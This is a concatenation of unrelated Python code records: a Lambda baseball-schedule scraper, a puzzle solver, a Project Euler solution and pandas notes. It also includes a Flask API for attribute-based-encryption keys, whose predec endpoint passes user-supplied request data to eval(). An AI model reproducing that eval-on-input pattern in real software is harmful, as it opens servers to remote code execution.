'npb-match-result'\nURL_TEMPLATE = 'http://npb.jp/games/{year}/schedule_{month}_detail.html'\nFILENAME_TEMPLATE = '{directory}/{year}_schedule.csv'\n\ndef lambda_handler(event, context):\n    s3 = boto3.resource('s3')\n\n    # options required to run Chrome headless\n    options = webdriver.ChromeOptions()\n    options.add_argument('--headless')\n    options.add_argument('--no-sandbox')\n    options.add_argument('--single-process')\n    # point at the browser binary\n    options.binary_location = './bin/headless-chromium'\n\n    # launch the browser\n    driver = webdriver.Chrome('./bin/chromedriver', chrome_options=options)\n\n    scrape(driver, s3)\n\n    driver.close()\n\ndef scrape(driver, s3):\n    with open(FILENAME_TEMPLATE.format(directory='/tmp', year=THIS_YEAR), 'w') as f:\n        writer = csv.writer(f)\n\n        for month in range(START_MONTH, END_MONTH + 1):\n            url = URL_TEMPLATE.format(year=THIS_YEAR, month=str(month).zfill(2))\n            try:\n                # access the page with the browser\n                driver.get(url)\n\n                # fetch the HTML with its character encoding converted to UTF-8\n                html = driver.page_source.encode('utf-8')\n                soup = BeautifulSoup(html,'html.parser')\n\n                for tr in soup.findAll('tr',id=re.compile('^date')):\n                    csv_row = []\n\n                    # get the match date\n                    if tr.find('th'):\n                        date = tr.find('th')\n\n                    for td in tr.findAll('td'):\n                        team1 = td.find('div', class_='team1')\n                        team2 = td.find('div', class_='team2')\n                        place = td.find('div', class_='place')\n                        time = td.find('div', class_='time')\n\n                        if team1 and team2:\n                            csv_row.append(str(THIS_YEAR) + '/' + date.string[:-3])\n                            csv_row.extend([team1.string, team2.string])\n                            if place and time:\n                                csv_row.extend([place.string, time.string])\n\n                        if csv_row and len(csv_row) == 5:\n                            writer.writerow(csv_row)\n\n                print('success target={year}/{month}'\n                      .format(year=THIS_YEAR, month=str(month).zfill(2)))\n            except Exception as e:\n                print('error_message:{message}'.format(message=e))\n\n    # upload to S3\n    bucket = s3.Bucket(BUCKET_NAME)\n    bucket.upload_file(FILENAME_TEMPLATE.format(directory='/tmp',year=THIS_YEAR),\n                       FILENAME_TEMPLATE.format(directory=THIS_YEAR,year=THIS_YEAR))\n\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"433483543","text":"from math import hypot\nfrom random import randint, choice\nPossiblePositions = [(i, j) for i in range(10) for j in range(10)]\n\n\ndef checkio(steps):\n    global PossiblePositions\n    # first move random\n    if len(steps) == 1:\n        PossiblePositions = [(i, j) for i in range(10) for j in range(10)]\n        while 1:\n            row = randint(0, 9)\n            col = randint(0, 9)\n            if [row, col] != steps[0][:2]:\n                PossiblePositions.remove((steps[0][0], steps[0][1]))\n                return [row, col]\n\n    DistanceMap1 = {}\n    for i in PossiblePositions:\n        DistanceMap1[i] = hypot(i[0] - steps[-1][0], i[1] - steps[-1][1])\n    DistanceMap2 = {}\n    for i in PossiblePositions:\n        DistanceMap2[i] = hypot(i[0] - steps[-2][0], i[1] - steps[-2][1])\n    if steps[-1][-1] == 1:\n        PossiblePositions = [i for i in PossiblePositions\n                             if DistanceMap1[i] < DistanceMap2[i]]\n    elif steps[-1][-1] == -1:\n        PossiblePositions = [i for i in PossiblePositions\n                             if DistanceMap1[i] > DistanceMap2[i]]\n    else:\n        PossiblePositions = [i for i in PossiblePositions\n                             if DistanceMap1[i] == DistanceMap2[i]]\n    return choice(PossiblePositions)\n\n\nif __name__ == '__main__':\n    # This part is using only for self-checking and not necessary for\n    # auto-testing\n    MAX_STEP = 12\n\n    def check_solution(func, goal, start):\n        prev_steps = [start]\n        for step in range(MAX_STEP):\n            row, col = func([s[:] for s in prev_steps])\n            if 
[row, col] == goal:\n return True\n if 10 <= row or 0 > row or 10 <= col or 0 > col:\n print(\"You gave wrong coordinates.\")\n return False\n prev_distance = hypot(\n prev_steps[-1][0] - goal[0], prev_steps[-1][1] - goal[1])\n distance = hypot(row - goal[0], col - goal[1])\n alteration = 0 if prev_distance == distance else (\n 1 if prev_distance > distance else -1)\n prev_steps.append([row, col, alteration])\n print(\"Too many steps\")\n return False\n\n assert check_solution(checkio, [7, 7], [5, 5, 0]), \"1st example\"\n assert check_solution(checkio, [5, 6], [0, 0, 0]), \"2nd example\"\n","sub_path":"Colder-Warmer.py","file_name":"Colder-Warmer.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"70986092","text":"'''THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE AND\nNON-INFRINGEMENT. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR ANYONE\nDISTRIBUTING THE SOFTWARE BE LIABLE FOR ANY DAMAGES OR OTHER LIABILITY,\nWHETHER IN CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.'''\n\n# Bitcoin Cash (BCH) qpz32c4lg7x7lnk9jg6qg7s4uavdce89myax5v5nuk\n# Ether (ETH) - 0x843d3DEC2A4705BD4f45F674F641cE2D0022c9FB\n# Litecoin (LTC) - Lfk5y4F7KZa9oRxpazETwjQnHszEPvqPvu\n# Bitcoin (BTC) - 34L8qWiQyKr8k4TnHDacfjbaSqQASbBtTd\n\n# contact :- github@jamessawyer.co.uk\n\n\n\n\"\"\"\nCounting Summations\nProblem 76\n\nIt is possible to write five as a sum in exactly six different ways:\n\n4 + 1\n3 + 2\n3 + 1 + 1\n2 + 2 + 1\n2 + 1 + 1 + 1\n1 + 1 + 1 + 1 + 1\n\nHow many different ways can one hundred be written as a sum of at least two\npositive integers?\n\"\"\"\n\n\ndef partition(m):\n \"\"\"Returns the number of different ways one hundred can be written as a sum\n of at least two positive integers.\n\n >>> partition(100)\n 190569291\n >>> partition(50)\n 204225\n >>> partition(30)\n 5603\n >>> partition(10)\n 41\n >>> partition(5)\n 6\n >>> partition(3)\n 2\n >>> partition(2)\n 1\n >>> partition(1)\n 0\n \"\"\"\n memo = [[0 for _ in range(m)] for _ in range(m + 1)]\n for i in range(m + 1):\n memo[i][0] = 1\n\n for n in range(m + 1):\n for k in range(1, m):\n memo[n][k] += memo[n][k - 1]\n if n > k:\n memo[n][k] += memo[n - k - 1][k]\n\n return memo[m][m - 1] - 1\n\n\nif __name__ == \"__main__\":\n print(partition(int(str(input()).strip())))\n","sub_path":"project_euler/problem_76/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"580417047","text":"from flask import g, jsonify, request, url_for\nfrom .models import User\nfrom . 
import main\nfrom app.ABE.ABE_TS import keygen, getGroup, predecrypt, dictToObject\nfrom app.ABE.models import getMSK_dict, getPK_dict\nfrom flask_httpauth import HTTPBasicAuth\nfrom app.ABE.models import Attribute\nfrom app import db\nfrom app.OSS.STSToken import generateDownloadAccessKey, generateUploadAccessKey, retrieveData\n\nauth = HTTPBasicAuth()\n\n@auth.verify_password\ndef verify_password(username, password):\n    user = User.query.filter_by(username=username).first()\n    if not user:\n        return False\n    g.current_user = user\n    return user.verify_password(password)\n\n@main.route('/profile/<username>', methods=['PUT'])\n@auth.login_required\ndef modifyProfile(username):\n    user = User.query.filter_by(username=username).first()\n    if g.current_user == user or g.current_user == User.query.filter_by(username='admin').first():\n        try:\n            if request.json.get('username'):\n                user.username = request.json.get('username')\n            if request.json.get('password'):\n                user.password = request.json.get('password')\n            if request.json.get('role'):\n                user.role = request.json.get('role')\n            attributes = None\n            if request.json.get('attributes'):\n                attributes = request.json.get('attributes') # format should be: 'ONE, TWO, THREE'\n                attributes = attributes.split(',')\n        except:\n            return \"incomplete information or illegal attributes format. \\n\\nexample:\\nusername: Fry\\npassword: yrF\\nrole: user\\nattributes: ONE, TWO, THREE\"\n        try:\n            user.attributes = []\n            if attributes:\n                for eachAttribute in attributes:\n                    attribute = Attribute.query.filter_by(description=eachAttribute).first()\n                    if not attribute:\n                        attribute = Attribute()\n                        attribute.description = eachAttribute\n                        db.session.add(attribute)\n                    user.attributes.append(attribute)\n            db.session.add(user)\n            db.session.commit()\n        except:\n            return 'database error.'\n        return 'user modification success.'\n    return 'you cannot modify other peoples profile.'\n\n@main.route('/profile/<username>/keygen')\n@auth.login_required\ndef getSK(username):\n    user = User.query.filter_by(username=username).first()\n    if g.current_user != user:\n        return 'you can not get other peoples ABE secret key.'\n    attributes = user.attributes\n    attributes_list = []\n    if attributes is None:\n        return 'no attribute provided.'\n    for each in attributes:\n        attributes_list.append(each.description)\n\n    group = getGroup()\n    pk_dict = getPK_dict(); pk = dictToObject(pk_dict=pk_dict, group=group)\n    msk_dict = getMSK_dict(); msk = dictToObject(msk_dict=msk_dict, group=group)\n    keys = keygen(pk=pk, msk=msk, S=attributes_list)\n    return jsonify(keys)\n\n@main.route('/profile/<username>', methods=['DELETE'])\n@auth.login_required\ndef deleteUser(username):\n    if g.current_user != User.query.filter_by(username='admin').first():\n        return 'admin login required.'\n    from app import db\n    user = User.query.filter_by(username=username).first()\n    if not user:\n        return 'user does not exist.'\n    try:\n        db.session.delete(user)\n    except:\n        return 'delete error.'\n    db.session.commit()\n    return 'user deletion success.'\n\n@main.route('/attribute', methods=['DELETE'])\n@auth.login_required\ndef deleteAttribute():\n    if g.current_user != User.query.filter_by(username='admin').first():\n        return 'admin login required.'\n    from app import db\n    from app.ABE.models import Attribute\n    attr = Attribute.query.filter_by(description=request.json.get('description')).first()\n    if not attr:\n        return 'attribute does not exist.'\n    try:\n        db.session.delete(attr)\n    except:\n        return 'delete error.'\n    db.session.commit()\n    return 'attribute deletion success.'\n\n
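# (editorial note) the predec endpoint below appears to implement the outsourced-decryption\n# pattern: the server runs the pairing-heavy predecrypt() with the transformation key 'ik',\n# and the client finishes decryption locally with its own secret key.\n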
@main.route('/profile/<username>/predec', methods=['POST'])\n@auth.login_required\ndef predec(username):\n    try:\n        ik_dict = eval(request.json.get('ik'))\n    except:\n        return 'no ik or incorrect ik format. get ik by Keygen api'\n    ct_stream = retrieveData(username)\n\n    pk_dict=getPK_dict(); ct_dict = eval(ct_stream.read()); group = getGroup()\n    IM = predecrypt(pk=dictToObject(pk_dict=pk_dict, group=group),\n                    ik=dictToObject(ik_dict=ik_dict, group=group),\n                    ct=dictToObject(ct_dict=ct_dict, group=group))\n\n    return jsonify({'IM':IM})\n\n@main.route('/uploadtoken')\n@auth.login_required\ndef getUploadToken():\n    username = g.current_user.username\n    from app.OSS.STSToken import generateUploadAccessKey\n    return jsonify(generateUploadAccessKey(username))\n\n@main.route('/downloadtoken')\n@auth.login_required\ndef getDownloadToken():\n    username = g.current_user.username\n    from app.OSS.STSToken import generateDownloadAccessKey\n    return jsonify(generateDownloadAccessKey(username))","sub_path":"app/main/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
{"seq_id":"179173351","text":"import pandas as pd\n\n\"\"\"\nthe most important part is the DataFrame\n\"\"\"\nreader = pd.read_csv(\"./Prostate_Cancer.csv\")\n\n# print(reader.values[:, 3:4].sum())\n# print(reader.columns)\n# print(reader.values[:, 3:4].min())\n\ndf = pd.DataFrame([[1, 2, 3, 4], [2, 2, 2, 2], [3, 3, 3, 3]], columns=[\"col1\", \"col2\", \"col3\", \"col4\"])\n\n# print(df)\n\"\"\"\ndf.mean() computes the mean of each column of the matrix by default\n\"\"\"\n\n\"\"\"\naxis = 0 is the row axis (the default), running vertically down the rows;\naxis = 1 is the column axis, running horizontally to the right\n\n\n\"\"\"\n# df = df.drop(\"col2\", axis=1)\n# print(df)\n\n# features = [i for i in reader.columns]\n# print(type(features))\n# l = [i for i in features]\n# print(l)\n\n\"\"\"\npandas: df.loc[1:2]\nnumpy: arr[1:2]\n\"\"\"\nprint(df.iloc[:1, 1:])\n\na = [11.1,11.2,11.3]\nprint(a.index(min(a)))","sub_path":"learn_pandas/explore_data.py","file_name":"explore_data.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}